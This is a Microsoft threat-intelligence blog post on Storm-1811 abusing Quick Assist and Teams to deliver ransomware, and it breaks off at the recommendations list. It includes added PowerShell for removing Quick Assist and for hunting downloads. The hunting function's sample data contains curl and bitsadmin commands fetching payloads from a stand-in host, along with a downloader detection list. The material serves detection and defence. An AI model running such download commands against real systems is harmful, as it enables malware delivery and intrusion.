{"id":134322,"date":"2024-05-15T09:00:00","date_gmt":"2024-05-15T16:00:00","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?p=134322"},"modified":"2024-06-05T14:00:02","modified_gmt":"2024-06-05T21:00:02","slug":"threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/05\/15\/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware\/","title":{"rendered":"Threat actors misusing Quick Assist in social engineering attacks leading to ransomware"},"content":{"rendered":"\n
\n

June 2024 update<\/strong>: At the end of May 2024, Microsoft Threat Intelligence observed Storm-1811 using Microsoft Teams as another vector to contact target users. Microsoft assesses that the threat actor uses Teams to send messages and initiate calls in an attempt to impersonate IT or help desk personnel. This activity leads to Quick Assist misuse, followed by credential theft using EvilProxy, execution of batch scripts, and use of SystemBC for persistence and command and control.<\/p>\n<\/blockquote>\n\n\n\n

Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool Quick Assist<\/a> to target users in social engineering attacks. Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware. The observed activity begins with impersonation through voice phishing (vishing<\/a>), followed by delivery of malicious tools, including remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, malware like Qakbot, Cobalt Strike, and ultimately Black Basta ransomware.<\/p>\n\n\n


Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. This enables the connecting user to remotely connect to the receiving user’s device and view its display, make annotations, or take full control, typically for troubleshooting. Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user\u2019s company to gain initial access to a target device.<\/p>\n\n\n


In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams. Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity.<\/p>\n\n\n


Organizations can also reduce the risk of attacks by blocking or uninstalling<\/a> Quick Assist and other remote management tools if the tools are not in use in their environment. Quick Assist is installed by default on devices running Windows 11. Additionally, tech support scams<\/a> are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services. Educating users on how to recognize such scams can significantly reduce the impact of social engineering attacks<\/a>. <\/p>\n\n\n\n
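The removal step described above, as an added PowerShell example that is not part of the original post. It inventories and removes both distributions of Quick Assist from a managed Windows device and then re-checks that nothing is left. The Store package name and the optional-capability name are taken from Microsoft's uninstall guidance and are assumed to still be current for the build being managed; confirm them with the Get-* calls before removing anything. Run from an elevated session.<\/p>

```powershell
# Added example, not Microsoft's own tooling: remove Quick Assist where it is not
# sanctioned. Names below are assumptions taken from the uninstall guidance; verify
# them against the live device before relying on them.
$storeApp   = 'MicrosoftCorporationII.QuickAssist'   # Microsoft Store build (Windows 11 default)
$capability = 'App.Support.QuickAssist~~~~0.0.1.0'   # legacy build shipped as a Windows capability

# 1. Store build: remove it from every existing profile, then deprovision it so new
#    profiles on the device do not get it back at first sign-in.
$installed = Get-AppxPackage -AllUsers -Name $storeApp
if ($installed) {
    $installed | Remove-AppxPackage -AllUsers
}
Get-AppxProvisionedPackage -Online |
    Where-Object DisplayName -eq $storeApp |
    Remove-AppxProvisionedPackage -Online

# 2. Legacy build: present on older Windows 10 images as an optional capability.
$cap = Get-WindowsCapability -Online -Name $capability
if ($cap.State -eq 'Installed') {
    Remove-WindowsCapability -Online -Name $capability
}

# 3. Verify: nothing should remain to answer the Ctrl + Windows + Q shortcut.
$remaining = @(Get-AppxPackage -AllUsers -Name $storeApp) +
             @(Get-WindowsCapability -Online -Name $capability | Where-Object State -eq 'Installed')
if ($remaining.Count -eq 0) {
    'Quick Assist is not installed on this device.'
} else {
    'Quick Assist components still present:'
    $remaining | Format-List Name, State
}
```

Removing the package does not stop a user from reinstalling it from the Microsoft Store; pair this with the Store or app-control policy your organization already uses, and apply the same inventory discipline to the other remote management tools named in this post (ScreenConnect, NetSupport Manager) so that any copy appearing on an endpoint is an investigation lead rather than background noise.<\/p>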

Social engineering<\/h2>\n\n\n\n

One of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks. Vishing attacks are a form of social engineering that involves callers luring targets into revealing sensitive information under false pretenses or tricking targets into carrying out actions on behalf of the caller.<\/p>\n\n\n\n

For example, threat actors might attempt to impersonate IT or help desk personnel, pretending to conduct generic fixes on a device. In other cases, threat actors initiate link listing attacks \u2013 a type of email bombing attack<\/a>, where threat actors sign targeted email addresses up to multiple email subscription services so that the inboxes are flooded indirectly with subscribed content. Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue.<\/p>\n\n\n\n

At the end of May 2024, Microsoft observed Storm-1811 using Microsoft Teams to send messages to and call target users. Tenants created by the threat actor are used to impersonate help desk personnel with names displayed as \u201cHelp Desk\u201d, \u201cHelp Desk IT\u201d, \u201cHelp Desk Support\u201d, and \u201cIT Support\u201d. Microsoft has taken action to mitigate this by suspending identified accounts and tenants associated with inauthentic behavior. Apply security best practices for Microsoft Teams<\/a> to safeguard Teams users.<\/p>\n\n\n\n

During the call, the threat actor persuades the user to grant them access to their device through Quick Assist. The target user only needs to press CTRL + Windows + Q and enter the security code provided by the threat actor, as shown in the figure below.<\/p>\n\n\n

\"Screenshot
Figure 1. Quick Assist prompt to enter security code<\/em><\/figcaption><\/figure>\n\n\n\n

After the target enters the security code, they receive a dialog box asking for permission to allow screen sharing. Selecting Allow<\/em> shares the user\u2019s screen with the actor.<\/p>\n\n\n

\"Screenshot
Figure 2. Quick Assist dialog box asking permission to allow screen sharing<\/em><\/figcaption><\/figure>\n\n\n\n

Once in the session, the threat actor can select Request Control<\/em>, which if approved by the target, grants the actor full control of the target\u2019s device.<\/em><\/p>\n\n\n

\"Screenshot
Figure 3. Quick Assist dialog box asking permission to allow control<\/em><\/figcaption><\/figure>\n\n\n\n

Follow-on activity leading to Black Basta ransomware<\/h2>\n\n\n\n

Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads. Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials. In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike.<\/p>\n\n\n

\"Screenshot
Figure 4. Examples of cURL commands to download batch files and ZIP files<\/em><\/figcaption><\/figure>\n\n\n\n

Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811.<\/p>\n\n\n\n

ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands.<\/p>\n\n\n\n

The mentioned RMM tools are commonly used by threat actors because of their extensive capabilities and ability to blend in with the environment. In some cases, the actors leveraged the OpenSSH tunneling tool to establish a secure shell (SSH) tunnel for persistence. <\/p>\n\n\n\n

After the threat actor installs the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement. <\/p>\n\n\n\n

In cases where Storm-1811 relies on Teams messages followed by phone calls and remote access through Quick Assist, the threat actor uses BITSAdmin<\/a> to download batch files and ZIP files from a malicious site, for example antispam3[.]com<\/em>. Storm-1811 also provides the target user with malicious links that redirect the user to an EvilProxy phishing site to input credentials. EvilProxy<\/a> is an adversary-in-the-middle (AiTM) phishing kit that proxies the real sign-in page so it can capture the password and the resulting session cookie, letting the attacker hijack the user\u2019s signed-in session and bypass multifactor authentication. Storm-1811 was also observed deploying SystemBC<\/a>, a post-compromise commodity remote access trojan (RAT) and proxy tool typically used to establish command-and-control communication, establish persistence in a compromised environment, and deploy follow-on malware, notably ransomware.<\/p>\n\n\n\n
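The download stage described in the two passages above (cURL in the original vishing cases, BITSAdmin in the Teams-led cases) is a useful hunting pivot: a native downloader fetching a .bat or .zip from an unfamiliar host within minutes of QuickAssist.exe starting on the same device is rare in legitimate use. The following PowerShell function is an added example, not Microsoft's detection content and not a Defender query; it correlates process-creation records by host and time. The record fields (Host, Time, Image, CommandLine) are an assumption modeled on Sysmon Event ID 1 or EDR process telemetry, the 60-minute window and the allowlist are tuning assumptions, and the sample rows are constructed, not real telemetry.<\/p>

```powershell
# Added example, not Microsoft's own detection logic. Flags native download tools
# that fetch batch or ZIP payloads shortly after a Quick Assist session starts on
# the same host. Field names are assumed to mirror Sysmon Event ID 1 / EDR data.
function Find-QuickAssistFollowOn {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int]      $WindowMinutes = 60,                      # assumption: tune per environment
        [string[]] $AllowedHosts  = @('*.microsoft.com')     # assumption: sanctioned download sources
    )
    $downloaders = @('curl.exe', 'bitsadmin.exe', 'certutil.exe')   # tools named in the post plus certutil
    $payloadRx   = [regex]'\.(bat|cmd|zip)\b'
    $urlRx       = [regex]'https?://([^/\s"'']+)'

    $findings = @()
    $sessions = $Events | Where-Object { $_.Image -ieq 'QuickAssist.exe' }
    foreach ($s in $sessions) {
        $until = $s.Time.AddMinutes($WindowMinutes)
        foreach ($e in $Events) {
            # Same device, inside the window after the session started, known downloader
            if ($e.Host -ne $s.Host) { continue }
            if ($e.Time -lt $s.Time -or $e.Time -gt $until) { continue }
            if ($downloaders -notcontains $e.Image) { continue }
            # Must reference a URL and a .bat/.cmd/.zip payload; drop sanctioned hosts
            $url = $urlRx.Match($e.CommandLine)
            if (-not $url.Success -or -not $payloadRx.IsMatch($e.CommandLine)) { continue }
            $remote  = $url.Groups[1].Value
            $allowed = $false
            foreach ($pat in $AllowedHosts) { if ($remote -like $pat) { $allowed = $true; break } }
            if ($allowed) { continue }
            $findings += [pscustomobject]@{
                Host         = $e.Host
                SessionStart = $s.Time
                MinutesAfter = [int]($e.Time - $s.Time).TotalMinutes
                Tool         = $e.Image
                RemoteHost   = $remote
                CommandLine  = $e.CommandLine
            }
        }
    }
    return $findings
}

# Constructed sample telemetry (not real events): one host with a Quick Assist session
# followed by a curl and a bitsadmin download, plus an allowlisted download that should
# not fire; a second host with curl but no Quick Assist session.
$t0 = Get-Date '2024-05-10T14:00:00'
$sample = @(
    [pscustomobject]@{ Host='WS-0412'; Time=$t0;                Image='QuickAssist.exe'; CommandLine='QuickAssist.exe' }
    [pscustomobject]@{ Host='WS-0412'; Time=$t0.AddMinutes(6);  Image='curl.exe';        CommandLine='curl.exe -o C:\Users\Public\spamfilter_update.bat https://antispam-update.invalid/spamfilter_update.bat' }
    [pscustomobject]@{ Host='WS-0412'; Time=$t0.AddMinutes(9);  Image='bitsadmin.exe';   CommandLine='bitsadmin.exe /transfer upd /download /priority high https://antispam-update.invalid/tools.zip C:\Users\Public\tools.zip' }
    [pscustomobject]@{ Host='WS-0412'; Time=$t0.AddMinutes(12); Image='curl.exe';        CommandLine='curl.exe -o C:\Temp\agent.zip https://download.microsoft.com/agent.zip' }
    [pscustomobject]@{ Host='WS-0200'; Time=$t0.AddMinutes(3);  Image='curl.exe';        CommandLine='curl.exe -o C:\Temp\build.zip https://antispam-update.invalid/build.zip' }
)

# Expected: two findings, both on WS-0412 (the curl at +6 min and the bitsadmin at +9 min).
Find-QuickAssistFollowOn -Events $sample | Format-Table -AutoSize
```

The correlation is deliberately on the host and clock rather than on the process tree: commands an attacker types into a Quick Assist session run under the user's shell (explorer.exe, cmd.exe), not under QuickAssist.exe, so a parent-child rule anchored on QuickAssist.exe would miss this activity. Extend the downloader list if your environment sees PowerShell web cmdlets used the same way, and treat an empty allowlist hit on a newly registered domain as a higher-severity finding.<\/p>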

In several cases, Storm-1811 uses PsExec to deploy Black Basta ransomware throughout the network. Black Basta is a closed ransomware offering (exclusive and not openly marketed like ransomware as a service) distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development. Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from Qakbot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat. In the next sections, we share recommendations for improving defenses against this threat, including best practices when using Quick Assist and mitigations for reducing the impact of Black Basta and other ransomware.<\/p>\n\n\n\n

Recommendations<\/h2>\n\n\n\n

Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist:<\/p>\n\n\n\n